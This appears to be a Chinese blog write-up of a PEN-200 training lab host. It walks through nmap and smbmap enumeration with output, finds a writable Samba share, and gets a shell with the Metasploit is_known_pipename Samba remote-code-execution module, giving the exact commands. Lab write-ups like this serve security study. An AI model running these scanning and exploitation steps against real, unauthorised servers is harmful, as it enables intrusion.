【pen200-lab】10.11.1.146
创始人
2024-04-15 18:01:30
0

pen200-lab 学习笔记

【pen200-lab】10.11.1.146


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集

信息收集

 nmap -p- --min-rate 10000 -A  10.11.1.146
22/tcp  open  ssh         OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e373a948819d90bc7075818a3de8956f (RSA)
|   256 0e7622d020ca1e96e97ba59a86e7f6d4 (ECDSA)
|_  256 57e1e406a3796d03536cd67b67ed86dc (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.4-Ubuntu (workgroup: WORKGROUP)

看起来主要是139以及445的业务
smbmap -H 10.11.1.146

[+] Guest session       IP: 10.11.1.146:445     Name: unknown                                           Disk                                                    PermissionsComment----                                                    ------------------print$                                                  NO ACCESS  Printer DriversSusieShare                                              READ, WRITEYOUR COMMENTSIPC$                              

SusieShare能够读写
smbclient -N //10.11.1.146/SusieShare
在这里插入图片描述
但是这是个空的文件

接着我会回头看
ssh的版本,没有问题
smb的似乎有点问题

samba smbd 4.5.4 exploit github

搜索
发现存在rce,号称linux永恒之蓝
用msf一把梭

use exploit/linux/samba/is_known_pipename
set rhoat[靶机ip]
run
shell
id

在这里插入图片描述
不用msf的方法尝试了很久没有成功,不过网上也有很多教程
这里不赘述了,这个lab的点就是samba的利用。只要能发现版本的问题,就能成功

相关内容

热门资讯

监控摄像头接入GB28181平... 流程简介将监控摄像头的视频在网站和APP中直播,要解决的几个问题是:1&...
Windows10添加群晖磁盘... 在使用群晖NAS时,我们需要通过本地映射的方式把NAS映射成本地的一块磁盘使用。 通过...
protocol buffer... 目录 目录 什么是protocol buffer 1.protobuf 1.1安装  1.2使用...
在Word、WPS中插入AxM... 引言 我最近需要写一些文章,在排版时发现AxMath插入的公式竟然会导致行间距异常&#...
【PdgCntEditor】解... 一、问题背景 大部分的图书对应的PDF,目录中的页码并非PDF中直接索引的页码...
Fluent中创建监测点 1 概述某些仿真问题,需要创建监测点,用于获取空间定点的数据࿰...
educoder数据结构与算法...                                                   ...
MySQL下载和安装(Wind... 前言:刚换了一台电脑,里面所有东西都需要重新配置,习惯了所...
MFC文件操作  MFC提供了一个文件操作的基类CFile,这个类提供了一个没有缓存的二进制格式的磁盘...
有效的括号 一、题目 给定一个只包括 '(',')','{','}'...